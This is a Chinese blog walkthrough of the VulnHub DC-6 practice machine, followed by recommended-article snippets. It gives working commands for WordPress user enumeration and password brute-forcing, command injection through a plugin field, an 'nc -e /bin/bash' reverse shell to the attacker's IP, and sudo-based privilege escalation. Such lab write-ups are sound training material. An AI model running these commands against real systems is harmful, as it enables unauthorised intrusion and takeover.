DC-6靶机详情

最新推荐文章于 2024-10-12 22:35:37 发布
最新推荐文章于 2024-10-12 22:35:37 发布
阅读量434 收藏 6
点赞数 4
文章标签: 数据库 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyanglailo/article/details/142252397
版权

一、环境搭建:

靶场下载地址: 
https://www.vulnhub.com/entry/dc-6,315/

二、渗透靶场

1、信息收集:寻找靶机真实IP
![](https://img-blog.csdnimg.cn/img_convert/9b4cb7cc30e0e7e421d924f23a12b0ac.png)![](https://img-blog.csdnimg.cn/img_convert/560915eb3d3f6991fabe1d589178a1ce.png)

192.168.150.154

2信息收集:探端口及服务
nmap -p- -sV -sT -A -O 192.168.150.154

3、访问web服务
192.168.150.154

把IP 和域名写入 hosts 文件中

在/目录下

cat /etc/hosts

再次访问

4,信息收集:web指纹识别
Whatweb指纹识别

whatweb -v 192.168.150.154

5,使用扫描网站结构
nikto -h http://192.168.150.154 -o nikto-wordy.txt

访问该页面

http://wordy/wp-login.php

6,获取用户密码
搜索用户名
```plain wpscan --url wordy -e u ```
发现5个用户
![](https://img-blog.csdnimg.cn/img_convert/ca808ec008967c0aa770199b7d940cf3.png)
制作用户字典
```plain vim wordy-users.dic ```

制作密码字典
```plain cd /usr/share/wordlists cp rockyou.txt.gz rockyou.txt.gz.bak gunzip rockyou.txt.gz rockyou.txt cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic ``` 

cat wordy-pass1.dic
7,爆破密码
```plain wpscan --url wordy -U wordy-users.dic -P wordy-pass1.dic ``` 
wpscan --url http://wordy/ -U wordy-users.dic -P wordy-pass1.dic

wpscan --url http://wordy/ --passwords 1.txt

登入

执行whoami

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
8.8.8.8;whoami

将这里修改为114.114.114.114;whoami

开启监听

nc -lvnp 55555

114.114.114.114;nc -e /bin/bash 192.168.150.145 55555

监听成功

进入交互式shell

www-data@dc-6:/var/www/html/wp-admin$

开始提权

sudo -l

需要密码

cd /home/mark/stuff

cat things-to-do.txt

发现账户

发现密码

graham - GSo7isUM1D4

输入这个

python -c 'import pty; pty.spawn("/bin/bash")'

切换用户

查看备份文件

cat /home/jens/backups.sh

发现里面是如下命令,是对web的文件进行打包备份

切换到jens目录下

echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh


echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

秋喜秋
关注
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 2097
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-5靶机
mlws1900的博客
03-25 855
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
DC-4靶机
mlws1900的博客
03-24 1211
下载不下来用迅雷下载。
DC-6靶机
mlws1900的博客
03-26 1688
开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件。登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本。命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup。不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打。设置网络为nat模式,启动打开时,发现错误直接重试和点是。看了大佬的wp,发现提示写在人家官网。
DC-3靶机
mlws1900的博客
03-23 773
下载不下来的可以用迅雷输入上面的网址进行下载。
DC-6靶机渗透
m0_62008601的博客
05-31 585
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
DC-6靶机渗透测试详细教程
啊醒的博客
05-04 2745
DC-6靶机渗透测试详细教程
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 843
DC-6靶机详细渗透过程
DC-6靶机通关
qq_63831588的博客
07-29 2125
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的提权还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
【vulnhub】---DC-6靶机
qq_43168364的博客
08-21 712
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1155
dc-1靶机详细获取flag过程新手勿喷
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1989
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
DC-3 靶机
weixin_63492470的博客
03-11 5478
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
PyQt 的Tree Widget中拖放和点击的异常行为
weixin_44617651的博客
10-10 497
在 PyQt 的 ​​QTreeWidget​​ 中,如果你遇到 拖放 和 点击 的异常行为,可能是由于信号处理、事件拦截、拖放设置或树结构配置等问题导致的。以下是一些可能的常见问题和解决方案。
MySQL数据库的详细学习步骤
2401_87352036的博客
10-11 1170
MySQL数据库的详细学习步骤可以归纳为以下几个阶段,每个阶段都包含了特定的学习内容和目标。
sqli-labs less-23 注释符绕过
wanggonghanfei的博客
10-10 1301
sqli-labs less-23 注释符绕过
Java分布式锁
最新发布
juanmiao的专栏
10-12 592
每种方法都有其优点和适应的场景,数据库通常简单,但可能存在性能问题,redis非常快,但需要第三方库,并且可能引入网诺问题,Zookeeper提供了更复杂的同步原语,但需要额外学习曲线。分布式锁的实现比线程锁和进程锁要复杂得多,因为它需要在网诺中的多个节点之间进行协调,以保证锁的唯一性和一致性。在实现分布式锁时,通常会有一个中心节点(或者称为锁服务),所有需要获取锁的节点都需要向这个中心节点申请。这个中心节点负责协调和管理所有节点的锁请求,确保锁的唯一性和一致性。创建临时节点,执行业务逻辑,释放锁。
如何使用ssm实现宠物论坛设计网站
寒夜
10-12 967
【代码】ssm宠物论坛设计网站
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值